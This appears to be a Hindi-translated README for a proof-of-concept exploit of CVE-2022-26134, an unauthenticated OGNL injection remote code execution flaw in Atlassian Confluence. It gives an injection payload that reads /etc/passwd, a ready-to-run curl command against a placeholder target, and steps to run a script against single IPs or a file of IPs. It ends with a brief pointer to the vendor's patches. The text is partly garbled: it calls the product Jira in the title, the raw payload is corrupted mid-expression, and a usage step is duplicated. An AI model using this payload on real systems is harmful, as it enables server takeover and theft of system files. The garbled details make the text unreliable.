
Atlassian Jira शोषण के लिए बस सरल PoC। सर्वर पर अनधिकृत उपयोगकर्ता के लिए कोड निष्पादन प्रदान करता है।
Atlassian Jira exploit के लिए एक सरल PoC। सर्वर पर अनधिकृत उपयोगकर्ता के लिए कोड निष्पादन प्रदान करता है।
CVE-2022-26134 - OGNL इंजेक्शन भेद्यता।
यह स्क्रिप्ट एक प्रूफ ऑफ कॉन्सेप्ट है जो Atlassian Confluence 7.18 और निचले उत्पादों को प्रभावित करने वाली रिमोट कोड निष्पादन भेद्यता का शोषण करती है। OGNL इंजेक्शन भेद्यता एक अनधिकृत उपयोगकर्ता को Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देती है।
${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}
CURL कमांड के साथ उदाहरण:
curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D"
फिर, कमांड का परिणाम रिस्पॉन्स हेडर में X-Cmd-Response पैरामीटर में दिखाई देगा।
विक्रेताओं से माइटिगेशन दिशानिर्देश
Atlassian की आधिकारिक अनुशंसाओं का पालन करें: https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
Atlassian ने संस्करण 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 और 7.18.1 जारी किए हैं जिनमें इस समस्या के लिए एक पैच है।
1. git clone https://github.com/iveresk/cve-2022-26134.git
2. cd cve-2022-26134
3. pip install -r requirements.txt
4. Ex#1: python3 cve-2022-26134.py <IP> <COMMAND> - command is optional - default will be set as "whoami" just to check if your server is vulnerable
5. Ex#2: 4. Ex#1: python3 cve-2022-26134.py <FILE-WITH-IPs> <COMMAND>
आप किसी भी विवरण के लिए Keybase के माध्यम से मुझसे संपर्क कर सकते हैं।